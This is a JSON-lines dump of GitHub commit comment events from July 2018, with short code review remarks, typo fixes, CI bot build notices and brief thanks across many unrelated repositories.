{"id":"7912511692","type":"CommitCommentEvent","actor":{"login":"Bernolt"},"repo":{"name":"apache/arrow"},"payload":{"comment":{"id":29580652,"position":9,"line":127,"path":"ci/travis_script_python.sh","commit_id":"c9ce215b9d22021268a1c2c3a70df99cb4f311c1","created_at":"2018-07-03T13:18:53Z","updated_at":"2018-07-03T13:18:53Z","author_association":"NONE","body":"If I understand well, we just want to allocate a plasma store of 1Go like in the plasma doc from ray? [https://arrow.apache.org/docs/python/plasma.html#using-plasma-with-huge-pages](url)\r\nSo we could compute the number of pages required to have 1Go of memory according to hugepagesize.\r\n\r\n"}},"created_at":"2018-07-03T13:18:53Z"}
{"id":"7912516124","type":"CommitCommentEvent","actor":{"login":"msdundar"},"repo":{"name":"omu/nokul"},"payload":{"comment":{"id":29580665,"position":null,"line":null,"path":null,"commit_id":"51eac87d056a55f39228298fd779b8960238c64b","created_at":"2018-07-03T13:19:40Z","updated_at":"2018-07-03T13:19:40Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-03T13:19:40Z"}
{"id":"7912516768","type":"CommitCommentEvent","actor":{"login":"exmackina"},"repo":{"name":"Irstea/collec"},"payload":{"comment":{"id":29580667,"position":2,"line":24,"path":"display/templates/apropos_en.tpl","commit_id":"13686a44794a601680db6fabd5723935a6af5183","created_at":"2018-07-03T13:19:47Z","updated_at":"2018-07-03T13:19:47Z","author_association":"COLLABORATOR","body":"Pour la version anglaise j'avais fait le choix de ne pas traduire le nom de l'université, mais c'est une solution parmi d'autres, avec chacune leurs avantages et inconvénients. Il est également possible de donner la version dans la langue d'origine, souvent accompagnée d'un sigle, et une version dans la langue cible. Par exemple on trouve \"Le Massachusetts Institute of Technology (MIT), en français Institut de technologie du Massachusetts\" au sujet du [MIT sur Wikipedia](https://fr.wikipedia.org/wiki/Massachusetts_Institute_of_Technology). Voici également un article intéressant à ce sujet : http://traductionquebec.com/domaine-de-la-traduction/traduction-du-nom-des-etablissements-scolaires-anglais/\r\nD'ailleurs ici \"Université Bordeaux 1\" n'a pas était traduit. Selon les règles de l'article ci-dessus, cela donnerait \"Bordeaux University\" mais où mettre le \"1\" ? ou bien \"University of Bordeaux 1\" comme sur [Wikipedia en anglais](https://en.wikipedia.org/wiki/University_of_Bordeaux_1) ? (on trouve aussi \"The University of Bordeaux\" sur https://www.u-bordeaux.com/About-us)"}},"created_at":"2018-07-03T13:19:47Z"}
{"id":"7912520811","type":"CommitCommentEvent","actor":{"login":"bvinayakumar"},"repo":{"name":"project-sunbird/sunbird-functional-tests"},"payload":{"comment":{"id":29580684,"position":5,"line":5,"path":"sunbird_service_api_test/src/test/resources/templates/organisation/create/create_suborg_with_existing_channel_request.json","commit_id":"3d4f194eb53e34841f7844ab168539ac1e1046f5","created_at":"2018-07-03T13:20:29Z","updated_at":"2018-07-03T13:20:29Z","author_association":"CONTRIBUTOR","body":"Typo: channel"}},"created_at":"2018-07-03T13:20:29Z"}
{"id":"7912523018","type":"CommitCommentEvent","actor":{"login":"sksamuel"},"repo":{"name":"sksamuel/exts"},"payload":{"comment":{"id":29580691,"position":8,"line":8,"path":"src/test/scala/com/sksamuel/exts/io/FileWatcherTest.scala","commit_id":"5f69f7254d9ad58a94dd304a0e1cdb560486d6c2","created_at":"2018-07-03T13:20:50Z","updated_at":"2018-07-03T13:20:50Z","author_association":"OWNER","body":"Should be fixed now btw.\n\nOn 22 June 2018 at 05:28, Seth Tisue <notifications@github.com> wrote:\n\n> failing in the Scala 2.12 community build at e.g.\n> https://scala-ci.typesafe.com/view/scala-2.12.x/job/scala-2.\n> 12.x-integrate-community-build/3029/consoleFull\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sksamuel/exts/commit/5f69f7254d9ad58a94dd304a0e1cdb560486d6c2#commitcomment-29458859>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAtZGrkZFGWNmr_PLcNRgXMxhfcpKsjIks5t_HJ0gaJpZM4UzICV>\n> .\n>\n"}},"created_at":"2018-07-03T13:20:50Z"}
{"id":"7912525469","type":"CommitCommentEvent","actor":{"login":"elpaidousi"},"repo":{"name":"elpaidousi/SpringBootApi"},"payload":{"comment":{"id":29580696,"position":null,"line":null,"path":null,"commit_id":"2416f1d496e4ca3e0ad64ea4f817ae0f0c346884","created_at":"2018-07-03T13:21:15Z","updated_at":"2018-07-03T13:21:15Z","author_association":"OWNER","body":"spring api"}},"created_at":"2018-07-03T13:21:15Z"}
{"id":"7912526125","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29580698,"position":15,"line":15,"path":"mysql-test/suite/innodb/t/virtual_purge.test","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:21:21Z","updated_at":"2018-07-03T13:21:21Z","author_association":"CONTRIBUTOR","body":"Do we really need the `IGNORE` in the `INSERT`?\r\nShouldn’t we store the original value of `debug_dbug` before assigning the variable, so that we can restore it?\r\n\r\nFor purge control, I think we need\r\n```sql\r\nSET @saved_frequency=@@GLOBAL.innodb_purge_rseg_truncate_frequency;\r\nSET GLOBAL innodb_purge_rseg_truncate_frequency=1;\r\n```\r\nat the very start of the test (before waiting for any old records to be purged)."}},"created_at":"2018-07-03T13:21:21Z"}
{"id":"7912526689","type":"CommitCommentEvent","actor":{"login":"bvinayakumar"},"repo":{"name":"project-sunbird/sunbird-functional-tests"},"payload":{"comment":{"id":29580700,"position":4,"line":4,"path":"sunbird_service_api_test/src/test/resources/templates/organisation/create/create_suborg_with_name_request.json","commit_id":"3d4f194eb53e34841f7844ab168539ac1e1046f5","created_at":"2018-07-03T13:21:27Z","updated_at":"2018-07-03T13:21:27Z","author_association":"CONTRIBUTOR","body":"Remove orgCode from this test."}},"created_at":"2018-07-03T13:21:27Z"}
{"id":"7912530076","type":"CommitCommentEvent","actor":{"login":"ramadv1"},"repo":{"name":"ramadv1/storytelling-with-git"},"payload":{"comment":{"id":29580712,"position":null,"line":null,"path":null,"commit_id":"f5e6bf1c9a8f6d26adab2ba5bd9adcbd4920adad","created_at":"2018-07-03T13:22:00Z","updated_at":"2018-07-03T13:22:00Z","author_association":"OWNER","body":"Shared in\r\n[https://www.facebook.com/groups/235075123710450/permalink/268406250377337/](url)"}},"created_at":"2018-07-03T13:22:00Z"}
{"id":"7912532563","type":"CommitCommentEvent","actor":{"login":"TallTed"},"repo":{"name":"openlink/virtuoso-opensource"},"payload":{"comment":{"id":29580721,"position":null,"line":null,"path":null,"commit_id":"508c85acfb1c39a2532acb384a03608346333052","created_at":"2018-07-03T13:22:24Z","updated_at":"2018-07-03T13:22:24Z","author_association":"COLLABORATOR","body":"s/RDF 4918/RFC 4918/"}},"created_at":"2018-07-03T13:22:24Z"}
{"id":"7912536869","type":"CommitCommentEvent","actor":{"login":"bvinayakumar"},"repo":{"name":"project-sunbird/sunbird-functional-tests"},"payload":{"comment":{"id":29580742,"position":142,"line":91,"path":"sunbird_service_api_test/src/test/java/org/sunbird/integration/test/org/OrganisationTest.java","commit_id":"3d4f194eb53e34841f7844ab168539ac1e1046f5","created_at":"2018-07-03T13:23:05Z","updated_at":"2018-07-03T13:23:05Z","author_association":"CONTRIBUTOR","body":"Define constant."}},"created_at":"2018-07-03T13:23:05Z"}
{"id":"7912537183","type":"CommitCommentEvent","actor":{"login":"pjcorp"},"repo":{"name":"suragnair/alpha-zero-general"},"payload":{"comment":{"id":29580745,"position":null,"line":null,"path":null,"commit_id":"065d95cc7e35dfa6baa210e558ee05d8c6757a2a","created_at":"2018-07-03T13:23:09Z","updated_at":"2018-07-03T13:23:09Z","author_association":"NONE","body":"Hi,\r\nI'm new on GitHub, not sure if this is the right place to ask my question about the code. I apologise if so.\r\nIn getSymmetries for connecting, shouldn't the vector pi also be reversed along with the  board?\r\nThanks"}},"created_at":"2018-07-03T13:23:09Z"}
{"id":"7912538012","type":"CommitCommentEvent","actor":{"login":"jonjomckay"},"repo":{"name":"manywho/service-sql"},"payload":{"comment":{"id":29580748,"position":13,"line":22,"path":"src/main/java/com/manywho/services/sql/services/PrimaryKeyService.java","commit_id":"e987e2502c34a49c4fd2b2203fcd3f362cba6240","created_at":"2018-07-03T13:23:16Z","updated_at":"2018-07-03T13:23:16Z","author_association":"MEMBER","body":"@josecollazzi the second part of the message should probably be `It should be a JSON object, then Base64 encoded, e.g. {\\\"id\\\": 1} would become eyJpZCI6MX0=`"}},"created_at":"2018-07-03T13:23:16Z"}
{"id":"7912538944","type":"CommitCommentEvent","actor":{"login":"jpayne23"},"repo":{"name":"jpayne23/simple-20180703095816141"},"payload":{"comment":{"id":29580749,"position":null,"line":null,"path":null,"commit_id":"8640329411afa88aae80ea2e684891a6af840be5","created_at":"2018-07-03T13:23:25Z","updated_at":"2018-07-03T13:23:25Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/a0ae9129-3ffc-4bf7-ac2b-05cb89d1c153?env_id=ibm%3Ayp%3Aeu-gb \"simple-20180703095816141\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/3c4f475e-d3f4-42fe-b3f9-fec43b342edd?env_id=ibm%3Ayp%3Aeu-gb \"simple-20180703095816141\") deployed [simple-20180703095816141](https://github.com/jpayne23/simple-20180703095816141/releases/tag/deploy-ibm-yp-eu-gb-joseph.payne-prod-20180703-132319 \"deploy-ibm-yp-eu-gb-joseph.payne-prod-20180703-132319\") to [prod](https://console.bluemix.net/apps/031f1bf1-ef91-4548-9293-2c0168898f66?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:joseph.payne:prod\"), including this commit"}},"created_at":"2018-07-03T13:23:25Z"}
{"id":"7912539283","type":"CommitCommentEvent","actor":{"login":"jtyr"},"repo":{"name":"jtyr/ansible-motd"},"payload":{"comment":{"id":29580751,"position":17,"line":44,"path":"README.md","commit_id":"b06bf8503cef003f5f17b1dd70bbfedc2a257289","created_at":"2018-07-03T13:23:29Z","updated_at":"2018-07-03T13:23:29Z","author_association":"OWNER","body":"The `|` means that the new lines in the block of text will be maintained:"}},"created_at":"2018-07-03T13:23:29Z"}
{"id":"7912540626","type":"CommitCommentEvent","actor":{"login":"BigBlueHat"},"repo":{"name":"RESTFest/videos.restfest.org"},"payload":{"comment":{"id":29580755,"position":10,"line":10,"path":"vimeo.js","commit_id":"c834bfa4e3a3ffcba107382aecc585a1f750fcdc","created_at":"2018-07-03T13:23:42Z","updated_at":"2018-07-03T13:23:42Z","author_association":"MEMBER","body":"I dug pretty deep in the API docs...and probably this libraries code. It's handy, though, to be sure."}},"created_at":"2018-07-03T13:23:42Z"}
{"id":"7912542644","type":"CommitCommentEvent","actor":{"login":"jonjomckay"},"repo":{"name":"manywho/service-sql"},"payload":{"comment":{"id":29580760,"position":22,"line":30,"path":"src/main/java/com/manywho/services/sql/services/PrimaryKeyService.java","commit_id":"e987e2502c34a49c4fd2b2203fcd3f362cba6240","created_at":"2018-07-03T13:24:00Z","updated_at":"2018-07-03T13:24:00Z","author_association":"MEMBER","body":"@josecollazzi this should be `There was an error serializing the primary key`"}},"created_at":"2018-07-03T13:24:00Z"}
{"id":"7912546568","type":"CommitCommentEvent","actor":{"login":"therewasaguy"},"repo":{"name":"processing/p5.js-sound"},"payload":{"comment":{"id":29580767,"position":14,"line":56,"path":"src/polysynth.js","commit_id":"30b77f3c1cde98e76f0d3f4478711475728fa8c8","created_at":"2018-07-03T13:24:39Z","updated_at":"2018-07-03T13:24:39Z","author_association":"MEMBER","body":"oscillator type (if String) or audioVoice (if it's an object)"}},"created_at":"2018-07-03T13:24:39Z"}
{"id":"7912546714","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29580768,"position":null,"line":null,"path":null,"commit_id":"78a082cf25fa5786dff1eabc8c5b6cf13a841d14","created_at":"2018-07-03T13:24:40Z","updated_at":"2018-07-03T13:24:40Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-03T13:24:40Z"}
{"id":"7912568544","type":"CommitCommentEvent","actor":{"login":"Nazgand"},"repo":{"name":"Nazgand/xbomb"},"payload":{"comment":{"id":29580832,"position":null,"line":null,"path":null,"commit_id":"5bb2053fea62aedc0747da94452589a302e018ab","created_at":"2018-07-03T13:28:26Z","updated_at":"2018-07-03T13:28:26Z","author_association":"OWNER","body":"Correction 'in not square'->'is not square'"}},"created_at":"2018-07-03T13:28:26Z"}
{"id":"7912571722","type":"CommitCommentEvent","actor":{"login":"vncoelho"},"repo":{"name":"CityOfZion/neon-js"},"payload":{"comment":{"id":29580838,"position":null,"line":null,"path":null,"commit_id":"91dec4d8693ba17aef394f1c687cd3ed6e73cab5","created_at":"2018-07-03T13:28:57Z","updated_at":"2018-07-03T13:28:57Z","author_association":"NONE","body":"Great catch, @igormcoelho !"}},"created_at":"2018-07-03T13:28:57Z"}
{"id":"7912573717","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29580840,"position":null,"line":null,"path":null,"commit_id":"45ad27571c9cd8ed850c2bd03d15309534ab21d8","created_at":"2018-07-03T13:29:15Z","updated_at":"2018-07-03T13:29:15Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#pr-11](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#pr-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-11-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-03T13:29:15Z"}
{"id":"7912576896","type":"CommitCommentEvent","actor":{"login":"CBenghi"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":29580858,"position":null,"line":null,"path":null,"commit_id":"0b71ba241493dcd09e9035b0195febe3efdf37eb","created_at":"2018-07-03T13:29:43Z","updated_at":"2018-07-03T13:29:43Z","author_association":"MEMBER","body":"@martin1cerny, \r\nhave a look at the code I've changed here.\r\nI expect the test and fix I've added to be the desired behaviour, but it's worth having another pair of eyes on it.\r\nThanks,\r\nClaudio"}},"created_at":"2018-07-03T13:29:43Z"}
{"id":"7912578237","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29580862,"position":null,"line":null,"path":null,"commit_id":"e7181d491d8a431eb2bc23652f9c2c491cb6d7c5","created_at":"2018-07-03T13:29:53Z","updated_at":"2018-07-03T13:29:53Z","author_association":"MEMBER","body":"@flyinghead I still seem to get the black screen though after the Infogrames FMV sequence."}},"created_at":"2018-07-03T13:29:53Z"}
{"id":"7912579784","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580868,"position":5,"line":5,"path":"hw4naz/components/Friend.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:30:09Z","updated_at":"2018-07-03T13:30:09Z","author_association":"NONE","body":"Более подходящим названием для компонента было бы `FriendEventsListItem` – потому что это элемент в списке истории друга."}},"created_at":"2018-07-03T13:30:09Z"}
{"id":"7912582129","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580877,"position":6,"line":6,"path":"hw4naz/components/Friend.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:30:29Z","updated_at":"2018-07-03T13:30:29Z","author_association":"NONE","body":"Стилю место в стайлшите."}},"created_at":"2018-07-03T13:30:29Z"}
{"id":"7912584380","type":"CommitCommentEvent","actor":{"login":"breversa"},"repo":{"name":"beetbox/beets"},"payload":{"comment":{"id":29580885,"position":null,"line":null,"path":null,"commit_id":"3d9fba399f40655c4dec3670f71396bad6d18e7a","created_at":"2018-07-03T13:30:51Z","updated_at":"2018-07-03T13:30:51Z","author_association":"NONE","body":"How about a release ? I'd love to try it out ! :-)"}},"created_at":"2018-07-03T13:30:51Z"}
{"id":"7912586387","type":"CommitCommentEvent","actor":{"login":"emm68"},"repo":{"name":"delph-in/pydmrs"},"payload":{"comment":{"id":29580888,"position":null,"line":null,"path":null,"commit_id":"c1cd2953578f367e2f2a9e62e6b9914bc03d694e","created_at":"2018-07-03T13:31:10Z","updated_at":"2018-07-03T13:31:10Z","author_association":"CONTRIBUTOR","body":"@goodmami pydmrs already forces lower case when reading predicates from strings (in normalise_string function in components.py). This change was mostly for consistency. \r\nI am a bit surprised about your observation though - the only upper case lemmas I encountered were for unknown words, which sometimes have \"word/POS\" lemma and sometimes \"word/pos\" (depending on the parser and grammar version, I suspect). But then I have only worked with ERG.\r\n\r\n@guyemerson Should we get rid of the conversion?"}},"created_at":"2018-07-03T13:31:10Z"}
{"id":"7912586742","type":"CommitCommentEvent","actor":{"login":"kaansancak"},"repo":{"name":"iVis-at-Bilkent/newt"},"payload":{"comment":{"id":29580891,"position":null,"line":null,"path":null,"commit_id":"176152057be5312f702aa36dd0b8712149d9d405","created_at":"2018-07-03T13:31:13Z","updated_at":"2018-07-03T13:31:13Z","author_association":"COLLABORATOR","body":"This can be related to #331 ."}},"created_at":"2018-07-03T13:31:13Z"}
{"id":"7912587441","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29580895,"position":null,"line":null,"path":null,"commit_id":"e7181d491d8a431eb2bc23652f9c2c491cb6d7c5","created_at":"2018-07-03T13:31:20Z","updated_at":"2018-07-03T13:31:20Z","author_association":"MEMBER","body":"@flyinghead However, thanks to this commit, Loony Tunes Space Race now appears to work."}},"created_at":"2018-07-03T13:31:20Z"}
{"id":"7912588604","type":"CommitCommentEvent","actor":{"login":"jeffvtang"},"repo":{"name":"jeffvtang/jungle-rails"},"payload":{"comment":{"id":29580897,"position":null,"line":null,"path":null,"commit_id":"2777bc15e2d49882a49a7a986b6742137c33b584","created_at":"2018-07-03T13:31:31Z","updated_at":"2018-07-03T13:31:31Z","author_association":"OWNER","body":"correcting email on previous commits resulted in duplication"}},"created_at":"2018-07-03T13:31:31Z"}
{"id":"7912597967","type":"CommitCommentEvent","actor":{"login":"JakeBozward"},"repo":{"name":"fboyle2001/SixthFormApp"},"payload":{"comment":{"id":29580923,"position":null,"line":null,"path":null,"commit_id":"cd3811d2033d61190fc8cccf1ccb5af61e9d7ab7","created_at":"2018-07-03T13:33:03Z","updated_at":"2018-07-03T13:33:03Z","author_association":"COLLABORATOR","body":"Yes"}},"created_at":"2018-07-03T13:33:03Z"}
{"id":"7912598077","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29580924,"position":8,"line":4418,"path":"sql/sql_class.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:33:04Z","updated_at":"2018-07-03T13:33:04Z","author_association":"CONTRIBUTOR","body":"Can we just expose `close_thread_tables()`?"}},"created_at":"2018-07-03T13:33:04Z"}
{"id":"7912598336","type":"CommitCommentEvent","actor":{"login":"laurynas-biveinis"},"repo":{"name":"vlad-lesin/percona-server"},"payload":{"comment":{"id":29580926,"position":43,"line":335,"path":"storage/innobase/lock/lock0wait.cc","commit_id":"a6a83032df54bece77d333ded35960c87d12d369","created_at":"2018-07-03T13:33:07Z","updated_at":"2018-07-03T13:33:07Z","author_association":"NONE","body":"I'd check if possible to savey only MYSQL_THD here and do the innobase_get_stmt_safe call outside the lock sys mutex critical section - but I don't see an easy way to guarantee that THD pointer will not become dangling"}},"created_at":"2018-07-03T13:33:07Z"}
{"id":"7912598771","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580927,"position":5,"line":5,"path":"hw4naz/components/FriendInfo.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:33:11Z","updated_at":"2018-07-03T13:33:11Z","author_association":"NONE","body":"Более подходящее название для компонента было бы `FriendSelectorItem` или что-то подобное."}},"created_at":"2018-07-03T13:33:11Z"}
{"id":"7912601595","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29580935,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-03T13:33:40Z","updated_at":"2018-07-03T13:33:40Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 147](https://teamcity.otenv.com/viewLog.html?buildId=8855865&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-03T13:33:40Z"}
{"id":"7912606666","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29580950,"position":18,"line":21613,"path":"storage/innobase/handler/ha_innodb.cc","commit_id":"ba67b50ac48d4911ebee4468007abce06b5d3093","created_at":"2018-07-03T13:34:29Z","updated_at":"2018-07-03T13:34:29Z","author_association":"CONTRIBUTOR","body":"Both parameters should be `in,out`, not `in`. I think that the entire parameter list should fit in a single line."}},"created_at":"2018-07-03T13:34:29Z"}
{"id":"7912610430","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29580963,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-03T13:35:08Z","updated_at":"2018-07-03T13:35:08Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 147](https://teamcity.otenv.com/viewLog.html?buildId=8855865&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **SUCCESS**\nSummary: Tests passed: 15 Build time: 00:01:28"}},"created_at":"2018-07-03T13:35:08Z"}
{"id":"7912610488","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580965,"position":6,"line":6,"path":"hw4naz/components/FriendInfo.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:35:09Z","updated_at":"2018-07-03T13:35:09Z","author_association":"NONE","body":"В фунциональном (правильном) стиле можно было бы написать:\r\n\r\n```ts\r\nconst checked = props.presented.some(index === props.index);\r\n```\r\n\r\nНо почему нельзя было высчитывать проп `checked` прямо в компоненте формы и не передавать сюда лишние данные?"}},"created_at":"2018-07-03T13:35:09Z"}
{"id":"7912615345","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580979,"position":5,"line":5,"path":"hw4naz/components/FriendsList.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T13:35:53Z","updated_at":"2018-07-03T13:35:53Z","author_association":"NONE","body":"Это ведь история переводов для определённого друга? Компонент в таком случае стоило бы назвать `FriendEventsList` или как-то наподобие этого."}},"created_at":"2018-07-03T13:35:53Z"}
{"id":"7912621093","type":"CommitCommentEvent","actor":{"login":"kylem123"},"repo":{"name":"kylem123/demos"},"payload":{"comment":{"id":29580991,"position":null,"line":null,"path":null,"commit_id":"90c6b2037301fd6d0148411cffb4cb80d5022512","created_at":"2018-07-03T13:36:50Z","updated_at":"2018-07-03T13:36:50Z","author_association":"OWNER","body":"Wasn't my example, just got it off the internet to test if tkinter launched, will get some actual tkinter examples in"}},"created_at":"2018-07-03T13:36:50Z"}
{"id":"7912622598","type":"CommitCommentEvent","actor":{"login":"martin1cerny"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":29580997,"position":null,"line":null,"path":null,"commit_id":"0b71ba241493dcd09e9035b0195febe3efdf37eb","created_at":"2018-07-03T13:37:05Z","updated_at":"2018-07-03T13:37:05Z","author_association":"MEMBER","body":"This should be OK. I found that using `object.Equals()` is a generally lot safer than using `==` because `==` override is never invoked on interfaces where they will always use reference comparison."}},"created_at":"2018-07-03T13:37:05Z"}
{"id":"7912623416","type":"CommitCommentEvent","actor":{"login":"emarucot"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":29580998,"position":null,"line":null,"path":null,"commit_id":"7f657dd22ac20d22698c53b23f0057e1a12c09b7","created_at":"2018-07-03T13:37:12Z","updated_at":"2018-07-03T13:37:12Z","author_association":"NONE","body":"I just committed it. "}},"created_at":"2018-07-03T13:37:12Z"}
{"id":"7912629858","type":"CommitCommentEvent","actor":{"login":"Desireemelusine"},"repo":{"name":"Desireemelusine/recipes"},"payload":{"comment":{"id":29581023,"position":null,"line":null,"path":null,"commit_id":"bb98965268a05e340db5fd74e466a60530faed58","created_at":"2018-07-03T13:38:14Z","updated_at":"2018-07-03T13:38:14Z","author_association":"OWNER","body":"ok done"}},"created_at":"2018-07-03T13:38:14Z"}
{"id":"7912631134","type":"CommitCommentEvent","actor":{"login":"jliljebl"},"repo":{"name":"mltframework/mlt"},"payload":{"comment":{"id":29581030,"position":null,"line":null,"path":null,"commit_id":"7bf5da86d4f2f8f83f45b9809fb061cbfdd97906","created_at":"2018-07-03T13:38:26Z","updated_at":"2018-07-03T13:38:26Z","author_association":"CONTRIBUTOR","body":"I have found that if I try to use any Qt dependent plugins, Flowblade always crashes. I seem to remember that there was some comment somewhere that said that applications needed to start some Qt thread before using Qt plugins, but I don't have the link now.\r\n\r\nAnyway, I just put Flowblade on summer break until August. If problem persists until I reactivate, I'll comment here with hopefully some more suggestions. \r\n\r\n"}},"created_at":"2018-07-03T13:38:26Z"}
{"id":"7912633140","type":"CommitCommentEvent","actor":{"login":"YachnikAlexander"},"repo":{"name":"YachnikAlexander/Training-Summer-Express-2018-C-"},"payload":{"comment":{"id":29581042,"position":77,"line":77,"path":"NET.S.2018.YACHNIK.03/PowNewtonMethod/FindingNRoot/RootNDegree.cs","commit_id":"66971dfe2ef0af92deffdd53c637cfd1a655ffc5","created_at":"2018-07-03T13:38:45Z","updated_at":"2018-07-03T13:38:45Z","author_association":"OWNER","body":"done\r\n"}},"created_at":"2018-07-03T13:38:45Z"}
{"id":"7912634548","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29581047,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-03T13:39:00Z","updated_at":"2018-07-03T13:39:00Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 224](https://teamcity.otenv.com/viewLog.html?buildId=8855900&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-03T13:39:00Z"}
{"id":"7912635135","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29581049,"position":null,"line":null,"path":null,"commit_id":"d6894f3621e8ea0af38cafe302381e2b5c906a14","created_at":"2018-07-03T13:39:05Z","updated_at":"2018-07-03T13:39:05Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#pr-11](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#pr-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-11-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-03T13:39:05Z"}
{"id":"7912638498","type":"CommitCommentEvent","actor":{"login":"djfinch"},"repo":{"name":"MoneroOcean/xmr-node-proxy"},"payload":{"comment":{"id":29581062,"position":null,"line":null,"path":null,"commit_id":"045f7e0a65d8e8ec78e2d8de94f76c5386539e98","created_at":"2018-07-03T13:39:38Z","updated_at":"2018-07-03T13:39:38Z","author_association":"NONE","body":"Thanks! I had this idea as well but forgot to \"implement\" it... ;)"}},"created_at":"2018-07-03T13:39:38Z"}
{"id":"7912642289","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29581079,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-03T13:40:16Z","updated_at":"2018-07-03T13:40:16Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 191](https://teamcity.otenv.com/viewLog.html?buildId=8855905&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-03T13:40:16Z"}
{"id":"7912642440","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29581080,"position":null,"line":null,"path":null,"commit_id":"44bd0f972916ff7720879ac4e3d0fbd078438f72","created_at":"2018-07-03T13:40:17Z","updated_at":"2018-07-03T13:40:17Z","author_association":"OWNER","body":"okay, the freeze is lifted.  The only major work left is sunos and I can just deal with whatever (since its so far out of date already)"}},"created_at":"2018-07-03T13:40:17Z"}
